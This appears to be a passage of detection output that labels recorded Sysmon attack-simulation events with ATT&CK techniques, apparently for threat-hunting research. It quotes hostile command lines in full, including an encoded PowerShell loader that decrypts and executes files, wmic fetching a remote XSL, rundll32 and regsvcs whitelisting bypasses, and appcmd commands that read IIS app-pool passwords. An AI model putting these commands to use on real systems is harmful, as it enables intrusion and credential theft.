+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1025
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-23 17:45:34.528
+ 365ABB72-DC3E-5CE6-0000-00102BC97200
+ 712
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-CE6C-5CE6-0000-002047F30000
+ 0xf347
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-CE6D-5CE6-0000-00109E190100
+ 1472
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 896
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-23 16:49:08.258
+ 365ABB72-CF04-5CE6-0000-001010F20C00
+ 4056
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe"
+ c:\
+ IEWIN7\IEUser
+ 365ABB72-CE6C-5CE6-0000-002047F30000
+ 0xf347
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-CF01-5CE6-0000-00105DA50C00
+ 3872
+ C:\Windows\System32\wbem\WMIC.exe
+ wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4919
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:28.756
+ 747F3D96-6628-5D3F-0000-0010B1968800
+ 5708
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 18
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:12.919
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\cryptdll.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Cryptography Manager
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 18
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:12.919
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\cryptdll.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Cryptography Manager
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5922
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.322
+ 365ABB72-3D6E-5CEB-0000-00104C92FF00
+ 3100
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5260
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ 2019-03-17 20:17:52.899
+ 365ABB72-AB70-5C8E-0000-0010781D0A00
+ 3272
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"
+ C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\
+ PC04\IEUser
+ 365ABB72-A960-5C8E-0000-002004C00300
+ 0x3c004
+ 1
+ High
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-A965-5C8E-0000-0010D9100400
+ 3884
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424261
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:22.062
+ 747F3D96-51FE-5F93-0000-0010DC535E00
+ 8920
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd
+ C:\PROGRA~3\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51FD-5F93-0000-00103B425E00
+ 7504
+ C:\Windows\SysWOW64\rundll32.exe
+ rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424261
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:22.062
+ 747F3D96-51FE-5F93-0000-0010DC535E00
+ 8920
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd
+ C:\PROGRA~3\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51FD-5F93-0000-00103B425E00
+ 7504
+ C:\Windows\SysWOW64\rundll32.exe
+ rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424261
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:22.062
+ 747F3D96-51FE-5F93-0000-0010DC535E00
+ 8920
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd
+ C:\PROGRA~3\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51FD-5F93-0000-00103B425E00
+ 7504
+ C:\Windows\SysWOW64\rundll32.exe
+ rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5919
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.232
+ 365ABB72-3D6E-5CEB-0000-00108C8EFF00
+ 3144
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlA